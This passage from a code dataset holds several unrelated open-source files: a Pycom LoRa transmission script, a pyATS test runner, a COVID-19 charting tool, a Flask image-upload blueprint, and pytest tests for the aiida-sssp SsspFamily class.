pycom.rgbled(light_green)\n i = 1\n airt = airtime[my_sf-7][my_bw_index]*1000 # conversion to ms\n round = int(math.ceil(100*airt/(airt + 2*guard))*(airt + 2*guard)) # we assume that the frame size (round) is defined by the duty cycle (need to change this for a higher number of nodes)\n print(\"round length = \", round)\n packets = 100 # number of packets to send\n active = 0.0\n print(\"S T A R T\")\n avg_desync = 0.0\n syncs = 1\n while(i <= packets):\n print(i, \"----------------------------------------------------\")\n start = chrono.read_ms()\n print(\"started new round at:\", start)\n t = int(my_slot*(airt + 2*guard) + guard) + int(avg_desync/syncs) # sleep time before transmission\n machine.idle()\n time.sleep_ms(t)\n pycom.rgbled(red)\n on_time = chrono.read_ms()\n lora.init(mode=LoRa.LORA, tx_iq=True, region=LoRa.EU868, frequency=freqs[my_sf-7], power_mode=LoRa.TX_ONLY, bandwidth=my_bw, sf=my_sf, tx_power=7)\n pkg = struct.pack(_LORA_PKG_FORMAT % len(msg), MY_ID, len(msg), msg)\n lora_sock.send(pkg)\n pycom.rgbled(blue)\n print(\"Message of \"+str(len(pkg))+\" bytes sent at:\", chrono.read_ms())\n lora.power_mode(LoRa.SLEEP)\n # print(lora.stats())\n cur_time = chrono.read_ms()\n active += (cur_time - on_time)\n t = round - int(cur_time - start)\n machine.idle()\n time.sleep_ms(t)\n if (i % sync_rate == 0): # synchronisatio\n syncs += 1\n sync_slot = 100 # I have to fix this\n rec = 0\n lora.init(mode=LoRa.LORA, rx_iq=True, region=LoRa.EU868, frequency=freqs[my_sf-7], power_mode=LoRa.ALWAYS_ON, bandwidth=my_bw, sf=my_sf)\n sync_start = chrono.read_ms()\n print(\"started sync slot at:\", sync_start)\n while (rec == 0):# and ((chrono.read_ms() - sync_start) <= sync_slot):\n machine.idle()\n pycom.rgbled(white)\n desync = 0\n recv_pkg = lora_sock.recv(100)\n if (len(recv_pkg) > 2):\n recv_pkg_len = recv_pkg[1]\n recv_pkg_id = recv_pkg[0]\n if (int(recv_pkg_id) == (my_sf-7+1)):\n dev_id, leng, s_msg = struct.unpack(_LORA_RCV_PKG_FORMAT % recv_pkg_len, recv_pkg)\n s_msg = str(s_msg)[2:]\n s_msg = s_msg[:-1]\n try: # 1st sync method\n s_msg = int(s_msg)\n s_msg += 10 # propagation time\n desync = s_msg - int(chrono.read_ms())\n print(\"desync: \"+str(desync)+\"ms\")\n avg_desync += desync\n if (avg_desync < 0):\n chrono.stop()\n time.sleep_ms(abs(int(avg_desync)))\n chrono.start()\n avg_desync = 0\n lora.power_mode(LoRa.SLEEP)\n active += (chrono.read_ms() - sync_start)\n time.sleep_ms(guard)\n rec = 1\n except ValueError: # alternative sync method\n if (str(s_msg) == \"sync\"):\n print(\"sync received!\")\n lora.power_mode(LoRa.SLEEP)\n active += (chrono.read_ms() - sync_start)\n time.sleep_ms(guard-1)\n rec = 1\n print(\"sync slot lasted:\", abs(time.ticks_diff(int(chrono.read_ms()), int(sync_start))), \"ms\")\n pycom.rgbled(blue)\n finish = chrono.read_ms()\n print(\"round lasted:\", abs(time.ticks_diff(int(finish), int(start))), \"ms\")\n print(\"Current active time\", active, \"ms\")\n i += 1\n\n print(\"Total active time\", active, \"ms\")\n pycom.rgbled(off)\n lora_sock.close()\n time.sleep(20)\n","repo_name":"deltazita/offline-lora","sub_path":"pycom_implementations/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24603500166","text":"import os\nfrom ats.easypy import run\nimport argparse\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--device', dest='device')\n parser.add_argument('--nbr-count', dest='expected_nbr_count')\n args, unknown = parser.parse_known_args()\n pwd = os.path.dirname(__file__)\n eigrp = os.path.join(pwd, 'EIGRP_TestCases.py')\n run(testscript=eigrp, **vars(args))\n","repo_name":"DevNetSandbox/sbx_multi_ios","sub_path":"dmvpn-as-code/tests/eigrp_neighbor_check.py","file_name":"eigrp_neighbor_check.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"61"} +{"seq_id":"21030182246","text":"import pandas as pd\nimport requests\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math as mt\n\ndef wget(url): #esta funcion importa archivos para Windows, es para la base de datos\n r = requests.get(url, allow_redirects=True)\n with open(url[url.rfind('/') + 1::], 'wb') as f:\n f.write(r.content)\nwget('https://covid.ourworldindata.org/data/ecdc/full_data.csv')\ndef es_numero(num,cant): #Esta funcion revisa que el input sea correcto o en caso contrario informa la necesidad de caracteres numericos\n if len(num)==cant: #requiere que un input tenga una determinada cantidad de caracteres\n if num.isdigit() is True: #chequea que el input sea numerico\n return True\n else: #En caso de que el input no sea numerico, informa de ese requerimiento\n print('Ingrese exclusivamente caracteres numericos por favor.')\n return False \n else: #En caso de que el input no tenga la cantidad necesaria, informa cual es.\n str_cant=str(cant) \n print('Ingrese '+str_cant+' caracteres por favor.')\n return False\n \ndef es_fecha_correcta(num,inicio,final): #Esta función revisa que las fechas esten en los valores correctos\n num=int(num)\n if num>=inicio and num<=final: #chequea que un int este dentro de los limites requeridos\n return True\n else: #si el input no esta dentro de los limites, informa cuales son.\n str_inicio=str(inicio)\n str_final=str(final)\n print('Ingrese un numero entre '+str_inicio+' y '+str_final+' por favor')\n return False\n\ndef año(num): #Chequea que el año ingresado sea válido.\n if es_numero(num,4) is True:\n if es_fecha_correcta(num,2019,2020) is True:\n return True\n else:\n return False\n else:\n return False\n\ndef mes(num): #Chequea que el mes ingresado sea válido.\n if es_numero(num,2) is True:\n if es_fecha_correcta(num,1,12) is True:\n return True\n else:\n return False\n else:\n return False\n\ncant_dias={31:['01','03','05','07','08','10','12'],30:['04','06','09','11']} #lista de meses con sus cantidades de dias respectivas.\ndef cant_dias_en_mes(mes): #Comprueba que el numero del dia coincida con la cantidad de dias del mes\n if mes in cant_dias[31]:\n return 31\n elif mes in cant_dias[30]:\n return 30\n elif mes == '02':\n if año_inicio =='2020':\n return 29\n if año_inicio =='2019':\n return 28\n\ndef dia(num,limite): #Chequea que el dia ingresado sea válido.\n if es_numero(num,2) is True:\n if es_fecha_correcta(num,1,limite) is True:\n return True\n else:\n return False\n else:\n return False\n\ndef graficar_casos(fecha,lista_paises,matriz,log): #Esta funcion genera los graficos. Recibe una lista de fechas, una de los paises a graficar, y una matriz con los valores de cada país\n for z in range (0,num_paises):\n plt.subplot(1, 2, 1) # grafico de nuevos casos\n plt.plot(fecha,matriz[:,0,z],':', label=lista_paises[z])\n print(fecha)\n print(matriz[:,0,z])\n plt.xlabel('fecha')\n plt.xticks(rotation=90)\n plt.ylabel('casos')\n log \n plt.title('Casos totales de COVID-19 según la fecha')\n plt.legend()\ndef graficar_muertes(fecha,lista_paises,matriz):\n for z in range (0,num_paises):\n plt.subplot(1, 2, 2) #grafico de nuevas muertes\n plt.plot(fecha,matriz[:,1,z],':', label=lista_paises[z])\n plt.ylabel('muertes')\n plt.xlabel('fecha')\n plt.xticks(rotation=90)\n plt.title('Muertes totales por COVID-19 según la fecha')\n plt.legend()\n\ndef find_intersecciones_y_graficar(fecha,matriz,dato_a_graficar): # Esta funcion encuentra las intersecciones entre las lineas a graficar y las señala con un punto azul\n largo=len(fecha)\n for pais in range (0,num_paises): #este for recorre cada país a graficar\n if pais<num_paises:\n for pais_a_comparar in range(pais+1,num_paises): #este for selecciona paises a comparar con el elegido arriba\n interseccion_indice=[]\n for valores in range (0,largo): #este for recorre las listas de valores sean de casos o de muertes\n if matriz[valores,dato_a_graficar,pais]==matriz[valores,dato_a_graficar,pais_a_comparar]:#este if detecta si hay valores en comun y guarda el indice en una lista\n interseccion_indice.append(valores)\n y_interseccion=[]\n x_interseccion=[]\n for x in interseccion_indice: #este for trae el valor de X y el valor de Y de las intersecciones\n y_interseccion.append(matriz[x,dato_a_graficar,pais])\n x_interseccion.append(fecha[x])\n if dato_a_graficar==0:\n plt.subplot(1, 2, 1) # casos\n plt.scatter(x_interseccion,y_interseccion,s = 10,c='blue' , linewidth = 5)\n elif dato_a_graficar==1:\n plt.subplot(1, 2, 2) # casos\n plt.scatter(x_interseccion,y_interseccion,s = 10,c='blue' , linewidth = 5)\n\n#este bloque obtiene la lista de paises del csv y toma una sola iteración de cada una para que \n# el input de pais elegido chequee contra esto.\ndata=pd.read_csv('full_data.csv')\ncolumna_pais=pd.DataFrame(data, columns= ['location'])\nlista_paises_repetidos=columna_pais.values.tolist() #genera una lista de la columna de paises de la base de datos\nlista_paises_correcta=np.unique(lista_paises_repetidos) #guarda una sola iteración de cada país de la base de datos\n\n#este bloque obtiene la lista de paises del csv y toma una sola iteración de cada una para que \n# el input de pais elegido chequee contra esto.\n\n\n\nprint('Bienvenido al graficador de COVID-19') \nconfirmacion_pais=0 #variable de confirmación del input\nwhile confirmacion_pais==0: #chequea que el usuario confirme su ingreso\n num_paises=(input('Ingrese numero de paises a comparar(Ej:02): '))\n while es_numero(num_paises,2) is False: #chequea que el ingreso sea la cantidad correcta de caracteres numericos\n num_paises=(input('Ingrese numero de paises a comparar(Ej:02): '))\n num_paises=int(num_paises)\n lista_paises_a_graficar=[] #lista en la que se almacenaran los paises a graficar\n for x in range (0,num_paises): # for que carga la lista de paises\n pais=input('Ingrese país(utilizando el nombre en inglés y con mayúscula(ej:Spain)): ') \n if pais in lista_paises_correcta: #Chequea que el input de pais sea válido en la base de datos\n lista_paises_a_graficar.append(pais)\n else:\n while pais not in lista_paises_correcta: #En caso de input invalido, requiere volver a ingresar\n print('Error al ingresar el nombre del país. Por favor, vuelva a intentar.(recuerde utilizar el nombre en inglés y con mayúscula(ej:Spain))')\n pais=input('Ingrese país(utilizando el nombre en inglés y con mayúscula(ej:Spain)): ')\n else:\n lista_paises_a_graficar.append(pais)\n print('usted ha seleccionado',end=' ') #muestra la lista ingresada y pide confirmacion\n print(lista_paises_a_graficar,end=' ') #muestra la lista ingresada y pide confirmacion\n conf=input('¿es correcto?(si/no)') #muestra la lista ingresada y pide confirmacion\n while not(conf=='si' or conf=='no'): #chequea que el input de confirmación sea estrictamente si o no\n conf=input('Ingrese si o no: ')\n if conf=='si':\n confirmacion_pais=1\n elif conf=='no':\n confirmacion_pais=0\n\n\nerror_fecha=1\nwhile error_fecha==1:\n confirmacion_fechas=0\n while confirmacion_fechas==0:\n print('Ingresar la fecha de inicio del periodo a consultar') #el csv usa el formato año-mes-dia\n año_inicio=(input('Ingrese año de inicio(Ej:2020): '))\n while año(año_inicio)is False:\n año_inicio=(input('Ingrese año de inicio(Ej:2020): '))\n mes_inicio=(input('Ingrese mes de inicio(Ej:06): '))\n while mes(mes_inicio)is False:\n mes_inicio=(input('Ingrese mes de inicio(Ej:06): '))\n dia_inicio_limite=cant_dias_en_mes(mes_inicio)\n dia_inicio=(input('Ingrese dia de inicio(Ej:08): '))\n while dia(dia_inicio,dia_inicio_limite)is False:\n dia_inicio=(input('Ingrese dia de inicio(Ej:08): '))\n\n fecha_inicio=año_inicio+'-'+mes_inicio+'-'+dia_inicio\n\n año_cierre=(input('Ingrese año de cierre(Ej:2020): '))\n while año(año_cierre)is False:\n año_cierre=(input('Ingrese año de cierre(Ej:2020): '))\n mes_cierre=(input('Ingrese mes de cierre(Ej:06): '))\n while mes(mes_cierre)is False:\n mes_cierre=(input('Ingrese mes de cierre(Ej:06): '))\n dia_cierre_limite=cant_dias_en_mes(mes_inicio)\n dia_cierre=(input('Ingrese dia de cierre(Ej:08): '))\n while dia(dia_cierre,dia_cierre_limite)is False:\n dia_cierre=(input('Ingrese dia de cierre(Ej:08): '))\n\n fecha_cierre=año_cierre+'-'+mes_cierre+'-'+dia_cierre\n print('usted ha seleccionado',end=' ') \n print(fecha_inicio,end=' y ')\n print(fecha_cierre,end=' ')\n conf=input('¿es correcto?(si/no)')\n while not(conf=='si' or conf=='no'):\n conf=input('Ingrese si o no: ')\n if conf=='si':\n confirmacion_fechas=1\n elif conf=='no':\n confirmacion_fechas=0\n if np.datetime64(fecha_cierre)<np.datetime64(fecha_inicio):\n error_fecha=1\n print('La fecha de cierre es anterior a la fecha de inicio. Ingrese los datos en el orden correcto por favor.')\n else:\n error_fecha=0\n#lista_paises_a_graficar\n#fecha_inicio\n#fecha_cierre\n\n#creación de array con valores de fechas para eje x\nfechaFinal = (np.datetime64(fecha_cierre)+np.timedelta64(1, 'D'))\nfechas=np.array(np.arange(fecha_inicio, fechaFinal, dtype='datetime64[D]'))\n\n#seteo de magnitud de dimensiones para array de valores de Y (nuevos casos, muertes)\ndias = (np.datetime64(fechaFinal) - np.datetime64(fecha_inicio) )\ncolumnas = 2\nmatrices = len(lista_paises_a_graficar)\nmatrizDatos = np.zeros([np.size(fechas), columnas, matrices], dtype=np.int64)\n\n#Verificaciones de matriz\n\n#print(matrizDatos)\n#print(np.size(fechas)*columnas*matrices)\n#print(np.size(matrizDatos))\n#print(np.shape(matrizDatos))\n\n\n#Verificacion array de fechas\n''' \nprint(fechas)\nprint(np.size(fechas))\n'''\n\n#busqueda de fecha en particular\n'''\ninicio = np.where(fechas == np.datetime64('2020-05-02'))[0]\nprint(inicio)\n'''\n\n#recoleccion de datos del pais necesario\ndatosPais = pd.DataFrame(data, columns= ['date','location','new_cases','new_deaths'])\nfor pais in lista_paises_a_graficar:\n arrayDatosPais = np.array(datosPais[datosPais.location == pais], )\n\n #print(arrayDatosPais)\n if ((np.datetime64(arrayDatosPais[0,0])) < (np.datetime64(fecha_inicio))):\n inicioDatoPais = int(np.where(arrayDatosPais == fecha_inicio)[0])\n inicioMatrizDatos = int(0)\n \n else:\n \n #inicioMatrizDatos = int(np.where(fechas == np.datetime64(arrayDatosPais[0][0]))[0])\n inicioMatrizDatos = int(np.where(arrayDatosPais == fecha_inicio)[0])\n inicioDatoPais = int(0)\n\n #print(inicioDatoPais)\n #print(inicioMatrizDatos)\n \n if (np.datetime64(arrayDatosPais[int((np.shape(arrayDatosPais)[0]))-1][0]) < (np.datetime64(fecha_cierre))):\n finalDeCarrera = np.size(fechas)\n \n else:\n \n finalDeCarrera = int(np.shape(arrayDatosPais)[0])\n finalDeCarrera = int(np.where(arrayDatosPais == fecha_cierre)[0])\n\n # print(finalDeCarrera)\n # print(np.size(fechas))\n\n \n print('inicioDatoPais: ',inicioDatoPais)\n print('inicioMatrizDatos: ',inicioMatrizDatos)\n print('inicioMatrizDatos+x: ',inicioMatrizDatos)\n print('finalDeCarrera: ',finalDeCarrera)\n\n for x in range(inicioDatoPais, finalDeCarrera, 1):\n \n '''\n print('x: ',x)\n print('inicioDatoPais: ',inicioDatoPais)\n print('inicioMatrizDatos: ',inicioMatrizDatos)\n print('inicioMatrizDatos+x: ',inicioMatrizDatos+x)\n print('finalDeCarrera: ',finalDeCarrera)\n '''\n \n if (int((np.shape(arrayDatosPais)[0]))>(int(np.shape(fechas)[0]))):\n\n if mt.isnan(arrayDatosPais [(x), 2]):\n print('nin_cases 1')\n matrizDatos[x-inicioDatoPais, 0, int(lista_paises_a_graficar.index(pais))] = int(0)\n else:\n print('cases 1')\n matrizDatos[x-inicioDatoPais, 0, int(lista_paises_a_graficar.index(pais))] = int(arrayDatosPais[x, 2])\n\n if mt.isnan(arrayDatosPais [(x), 3]):\n print('nin_death 1')\n matrizDatos [x-inicioDatoPais, 1, int(lista_paises_a_graficar.index(pais))] = int(0)\n else:\n print:('death 1')\n matrizDatos[x-inicioDatoPais, 1, int(lista_paises_a_graficar.index(pais))] = int(arrayDatosPais[x, 3])\n else:\n if ((x<inicioMatrizDatos) or (x>(int((np.shape(arrayDatosPais)[0]))))):\n \n matrizDatos[x, 0, int(lista_paises_a_graficar.index(pais))] = int(0)\n matrizDatos[x, 1, int(lista_paises_a_graficar.index(pais))] = int(0)\n \n else:\n if mt.isnan(arrayDatosPais [(x-1), 2]):\n print('nin_cases 2')\n matrizDatos[x, 0, int(lista_paises_a_graficar.index(pais))] = int(0)\n else:\n print('cases 2')\n matrizDatos[x, 0, int(lista_paises_a_graficar.index(pais))] = int(arrayDatosPais[x-1, 2])\n\n if mt.isnan(arrayDatosPais [(x-1), 3]):\n print('nin_death 2')\n matrizDatos[x, 1, int(lista_paises_a_graficar.index(pais))] = int(0)\n else:\n print('death 2')\n matrizDatos[x, 1, int(lista_paises_a_graficar.index(pais))] = int(arrayDatosPais[x-1, 3])\n\n\n#plt.plot(fechas,matrizDatos[:,0,0])\n#plt.show()\n\nlen_paises=len(lista_paises_a_graficar)\nif len_paises==1:\n graficar_casos(fechas,lista_paises_a_graficar,matrizDatos,'')\n graficar_muertes(fechas,lista_paises_a_graficar,matrizDatos)\nelif len_paises==2:\n graficar_casos(fechas,lista_paises_a_graficar,matrizDatos,'')\n graficar_muertes(fechas,lista_paises_a_graficar,matrizDatos)\n find_intersecciones_y_graficar(fechas,matrizDatos,0)\n find_intersecciones_y_graficar(fechas,matrizDatos,1)\nelif len_paises>2:\n graficar_casos(fechas,lista_paises_a_graficar,matrizDatos,'plt.yscale(log)')\n find_intersecciones_y_graficar(fechas,matrizDatos,0)\n\nplt.get_current_fig_manager().window.state('zoomed')\nplt.show()\n","repo_name":"KhamilN/Graficador-COVID-19","sub_path":"Graficador COVID-19.py","file_name":"Graficador COVID-19.py","file_ext":"py","file_size_in_byte":14886,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9431620474","text":"from flask import (\n\tBlueprint,\n\trequest,\n\tsession,\n\tjsonify,\n\tcurrent_app,\n\turl_for,\n\tsend_from_directory\n)\n\nimport uuid\n\nimport os\n\nfrom werkzeug.utils import secure_filename\n\nfrom db import db\n\n# Список разрешённых к передаче расширений файлов\nALLOWED_EXTENSIONS = set(['.png', '.jpg', '.jpeg', '.gif'])\n\nbp = Blueprint('images', __name__)\n\n@bp.route('', methods=[\"POST\"])\ndef images():\n\t\"\"\" Обработка добавления в БД URL ссылки на изображение \"\"\"\n\t# получаем user_id из текущей сессии\n\tuser_id = session.get('user_id')\n\t\n\t# если, user_id не существует, значит сессия не создана,\n\t# возвращаем код 403\n\tif user_id is None:\n\t\treturn '', 403\n\t\n\t# создаём соединение с БД\n\tcon = db.connection\n\t\n\t# проверяем в БД, является ли выбранный пользователь продавцом\n\tcur = con.execute(\"\"\"\n\t\tSELECT slr.id\n\t\tFROM account AS ac\n\t\t\tJOIN seller AS slr ON slr.account_id = ac.id\n\t\tWHERE ac.id = ?\n\t\t\"\"\",\n\t\t(user_id,)\n\t)\n\tis_seller = cur.fetchone()\n\t\n\t# если пользователь является продавцом\n\tif is_seller is not None:\n\t\t# пробуем получить файл из запроса\n\t\ttry:\n\t\t\tfile = request.files['image']\n\t\texcept:\n\t\t\t# файла в запросе нет, вернём код 400\n\t\t\treturn '', 400\n\t\t\n\t\t# если файл получен, сохраним его в папку\n\t\tif file:\n\t\t\torig_fn = secure_filename(file.filename)\n\t\t\tfile_ext = os.path.splitext(orig_fn)[1]\n\t\t\tfilename = f'{uuid.uuid4()}{file_ext}'\t\t\t\n\t\t\tupload_path = current_app.config['UPLOAD_FOLDER']\n\t\t\t\n\t\t\t# проверим расширение передаваемого файла на соответствие\n\t\t\tif file_ext in ALLOWED_EXTENSIONS:\n\t\t\t\tfile.save(os.path.join(upload_path, filename))\n\t\t\t\treturn jsonify(\n\t\t\t\t\t{'url' : url_for('images.get_images', filename=filename)}\n\t\t\t\t), 200\n\t\t\n\t\treturn '', 400\n\t\n\t# иначе пользователь не ��арегистрирован как продавец, то вернём код 403\n\treturn '', 403\n\n@bp.route('/<filename>')\ndef get_images(filename):\n\t\"\"\" Обработка получения по имени и Url пути изображения \"\"\"\n\t# получим путь папки с файлами загружаемых картинок\n\tupload_path = current_app.config['UPLOAD_FOLDER']\n\n\t# проверим, есть ли указанный файл по пути\n\tif os.path.exists(upload_path):\n\t\t# указанный файл найден, вернём его\n\t\treturn send_from_directory(\n\t\t\tupload_path,\n\t\t\tfilename,\n\t\t\tas_attachment=True\n\t\t)\n\t\n\t# указанный файл не найден, вернём код 404\n\treturn '', 404\n","repo_name":"MB6718/Auto-Sales-Site","sub_path":"src/blueprints/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25061787334","text":"# -*- coding: utf-8 -*-\n# pylint: disable=unused-argument,pointless-statement\n\"\"\"Tests for the `SsspFamily` class.\"\"\"\nimport copy\nimport distutils.dir_util\nimport os\nimport shutil\nimport tempfile\n\nimport pytest\n\nfrom aiida import orm\nfrom aiida.common import exceptions\n\nfrom aiida_sssp.data import SsspParameters\nfrom aiida_sssp.groups import SsspFamily\n\n\ndef test_type_string(clear_db):\n \"\"\"Verify the `_type_string` class attribute is correctly set to the corresponding entry point name.\"\"\"\n assert SsspFamily._type_string == 'sssp.family' # pylint: disable=protected-access\n\n\ndef test_construct(clear_db):\n \"\"\"Test the construction of `SsspFamily` works.\"\"\"\n family = SsspFamily(label='SSSP').store()\n assert isinstance(family, SsspFamily)\n\n description = 'SSSP description'\n family = SsspFamily(label='SSSP/v1.1', description=description).store()\n assert isinstance(family, SsspFamily)\n assert family.description == description\n\n\ndef test_load(clear_db):\n \"\"\"Test that loading of a `SsspFamily` through `load_group` works.\"\"\"\n family = SsspFamily(label='SSSP').store()\n assert isinstance(family, SsspFamily)\n\n loaded = orm.load_group(family.pk)\n assert isinstance(family, SsspFamily)\n assert loaded.uuid == family.uuid\n assert loaded.elements == family.elements\n\n\ndef test_add_nodes(clear_db, get_upf_data):\n \"\"\"Test the `SsspFamily.add_nodes` method.\"\"\"\n upf_he = get_upf_data(element='He').store()\n upf_ne = get_upf_data(element='Ne').store()\n upf_ar = get_upf_data(element='Ar').store()\n family = SsspFamily(label='SSSP').store()\n\n with pytest.raises(TypeError):\n family.add_nodes(orm.Data().store())\n\n with pytest.raises(TypeError):\n family.add_nodes([orm.Data().store(), orm.Data().store()])\n\n with pytest.raises(TypeError):\n family.add_nodes([upf_ar, orm.Data().store()])\n\n assert family.count() == 0\n\n family.add_nodes(upf_he)\n assert family.count() == 1\n\n # Check that adding a duplicate element raises, and that no extra nodes have been added.\n with pytest.raises(ValueError):\n family.add_nodes([upf_ar, upf_he, upf_ne])\n assert family.count() == 1\n\n family.add_nodes([upf_ar, upf_ne])\n assert family.count() == 3\n\n\ndef test_elements(clear_db, get_upf_data):\n \"\"\"Test the `SsspFamily.elements` property.\"\"\"\n upf_he = get_upf_data(element='He').store()\n upf_ne = get_upf_data(element='Ne').store()\n upf_ar = get_upf_data(element='Ar').store()\n family = SsspFamily(label='SSSP').store()\n\n family.add_nodes([upf_he, upf_ne, upf_ar])\n assert family.count() == 3\n assert sorted(family.elements) == ['Ar', 'He', 'Ne']\n\n\ndef test_get_pseudo(clear_db, get_upf_data):\n \"\"\"Test the `SsspFamily.get_pseudo` property.\"\"\"\n upf_he = get_upf_data(element='He').store()\n upf_ne = get_upf_data(element='Ne').store()\n upf_ar = get_upf_data(element='Ar').store()\n family = SsspFamily(label='SSSP').store()\n family.add_nodes([upf_he, upf_ne, upf_ar])\n\n with pytest.raises(ValueError) as exception:\n family.get_pseudo('X')\n\n assert 'family `{}` does not contain pseudo for element'.format(family.label) in str(exception.value)\n\n element = 'He'\n upf = family.get_pseudo(element)\n assert isinstance(upf, orm.UpfData)\n assert upf.element == element\n\n\ndef test_validate_parameters(clear_db, create_sssp_family, create_sssp_parameters):\n \"\"\"Test the `SsspFamily.validate_parameters` class method.\"\"\"\n family = create_sssp_family()\n parameters = create_sssp_parameters()\n metadata = parameters.get_metadata()\n\n SsspFamily.validate_parameters(list(family.nodes), parameters)\n\n # Incorrect filename\n incorrect = copy.deepcopy(metadata['Ar'])\n incorrect['filename'] = 'wrong_file_name'\n parameters.set_attribute('Ar', incorrect)\n\n with pytest.raises(ValueError) as exception:\n SsspFamily.validate_parameters(list(family.nodes), parameters)\n\n assert 'inconsistent `filename` for element `Ar`' in str(exception.value)\n\n # Incorrect md5\n incorrect = copy.deepcopy(metadata['Ar'])\n incorrect['md5'] = '123abc'\n parameters.set_attribute('Ar', incorrect)\n\n with pytest.raises(ValueError) as exception:\n SsspFamily.validate_parameters(list(family.nodes), parameters)\n\n assert 'inconsistent `md5` for element `Ar`' in str(exception.value)\n\n\ndef test_create_from_folder(clear_db, filepath_pseudos):\n \"\"\"Test the `SsspFamily.create_from_folder` class method.\"\"\"\n label = 'SSSP'\n family = SsspFamily.create_from_folder(filepath_pseudos, label)\n\n assert isinstance(family, SsspFamily)\n assert family.is_stored\n assert family.count() == len(os.listdir(filepath_pseudos))\n assert sorted(family.elements) == sorted([filename.rstrip('.upf') for filename in os.listdir(filepath_pseudos)])\n\n # Cannot create another family with the same label\n with pytest.raises(ValueError):\n SsspFamily.create_from_folder(filepath_pseudos, label)\n\n with pytest.raises(TypeError) as exception:\n SsspFamily.create_from_folder(filepath_pseudos, label, description=1)\n assert 'Got object of type' in str(exception.value)\n\n\ndef test_create_from_folder_invalid(clear_db, filepath_pseudos):\n \"\"\"Test the `SsspFamily.create_from_folder` class method for invalid inputs.\"\"\"\n label = 'SSSP'\n\n with tempfile.TemporaryDirectory() as dirpath:\n\n # Non-existing directory should raise\n with pytest.raises(ValueError) as exception:\n SsspFamily.create_from_folder(os.path.join(dirpath, 'non-existing'), label)\n\n assert 'is not a directory' in str(exception.value)\n assert SsspFamily.objects.count() == 0\n assert orm.UpfData.objects.count() == 0\n\n distutils.dir_util.copy_tree(filepath_pseudos, dirpath)\n\n # Copy an existing pseudo to test that duplicate elements are not allowed\n filename = os.listdir(dirpath)[0]\n filepath = os.path.join(dirpath, filename)\n shutil.copy(filepath, os.path.join(dirpath, filename[:-4] + '2.upf'))\n\n with pytest.raises(ValueError) as exception:\n SsspFamily.create_from_folder(dirpath, label)\n\n assert 'contains pseudo potentials with duplicate elements' in str(exception.value)\n assert SsspFamily.objects.count() == 0\n assert orm.UpfData.objects.count() == 0\n\n # Create an empty folder in the pseudo directory, which is not allowed\n dirpath_sub = os.path.join(dirpath, 'random_sub_folder')\n os.makedirs(dirpath_sub)\n\n with pytest.raises(ValueError) as exception:\n SsspFamily.create_from_folder(dirpath, label)\n\n assert 'contains at least one entry that is not a file' in str(exception.value)\n assert SsspFamily.objects.count() == 0\n assert orm.UpfData.objects.count() == 0\n os.rmdir(dirpath_sub)\n\n # Create a dummy file that does not have a valid UPF format\n with open(filepath, 'w') as handle:\n handle.write('invalid pseudo format')\n\n with pytest.raises(ValueError) as exception:\n SsspFamily.create_from_folder(dirpath, label)\n\n assert 'failed to parse' in str(exception.value)\n assert SsspFamily.objects.count() == 0\n assert orm.UpfData.objects.count() == 0\n\n\ndef test_create_from_folder_with_parameters(clear_db, filepath_pseudos, sssp_parameter_filepath):\n \"\"\"Test the `SsspFamily.create_from_folder` class method when passing a file with pseudo metadata.\"\"\"\n with pytest.raises(TypeError):\n SsspFamily.create_from_folder(filepath_pseudos, 'SSSP', filepath_parameters={})\n\n # Test directly from filepath\n family = SsspFamily.create_from_folder(filepath_pseudos, 'SSSP/1.0', filepath_parameters=sssp_parameter_filepath)\n assert isinstance(family, SsspFamily)\n assert family.is_stored\n\n parameters = family.get_parameters_node()\n assert parameters.family_uuid == family.uuid\n\n # Test from filelike object\n with open(sssp_parameter_filepath) as handle:\n family = SsspFamily.create_from_folder(filepath_pseudos, 'SSSP/1.1', filepath_parameters=handle)\n assert isinstance(family, SsspFamily)\n assert family.is_stored\n\n parameters = family.get_parameters_node()\n assert parameters.family_uuid == family.uuid\n\n\ndef test_get_parameters_node(clear_db, create_sssp_family, create_sssp_parameters):\n \"\"\"Test the `SsspFamily.get_parameters_node` method.\"\"\"\n family = create_sssp_family()\n\n with pytest.raises(exceptions.NotExistent):\n family.get_parameters_node()\n\n parameters = create_sssp_parameters(uuid=family.uuid).store()\n\n assert isinstance(family.get_parameters_node(), SsspParameters)\n assert family.get_parameters_node().uuid == parameters.uuid\n\n\ndef test_parameters(clear_db, create_sssp_family, create_sssp_parameters):\n \"\"\"Test the `SsspFamily.parameters` property.\"\"\"\n family = create_sssp_family()\n\n with pytest.raises(exceptions.NotExistent):\n family.parameters\n\n parameters = create_sssp_parameters(uuid=family.uuid).store()\n\n assert isinstance(family.parameters, dict)\n assert family.parameters == parameters.attributes\n\n\ndef test_get_parameter(clear_db, create_sssp_family, create_sssp_parameters, sssp_parameter_metadata):\n \"\"\"Test the `SsspFamily.get_parameter` method.\"\"\"\n family = create_sssp_family()\n\n with pytest.raises(exceptions.NotExistent):\n family.get_parameter('Ar', 'cutoff')\n\n parameters = create_sssp_parameters(uuid=family.uuid).store()\n\n with pytest.raises(KeyError):\n family.get_parameter('Br', 'cutoff')\n\n with pytest.raises(KeyError):\n family.get_parameter('Ar', 'parameter')\n\n element = 'Ar'\n key_cutoff_wfc = 'cutoff_wfc'\n key_cutoff_rho = 'cutoff_rho'\n\n assert family.get_parameter(element, key_cutoff_wfc) == parameters.get_attribute(element)[key_cutoff_wfc]\n assert family.get_parameter(element, key_cutoff_rho) == parameters.get_attribute(element)[key_cutoff_rho]\n\n\ndef test_get_cutoffs(clear_db, create_sssp_family, create_sssp_parameters, create_structure):\n \"\"\"Test the `SsspFamily.get_cutoffs` method.\"\"\"\n family = create_sssp_family()\n parameters = create_sssp_parameters(uuid=family.uuid).store().attributes\n structure = create_structure(site_kind_names=['Ar', 'He', 'Ne'])\n\n with pytest.raises(ValueError):\n family.get_cutoffs(elements=None, structure=None)\n\n with pytest.raises(ValueError):\n family.get_cutoffs(elements='Ar', structure=structure)\n\n with pytest.raises(TypeError):\n family.get_cutoffs(elements=False, structure=None)\n\n with 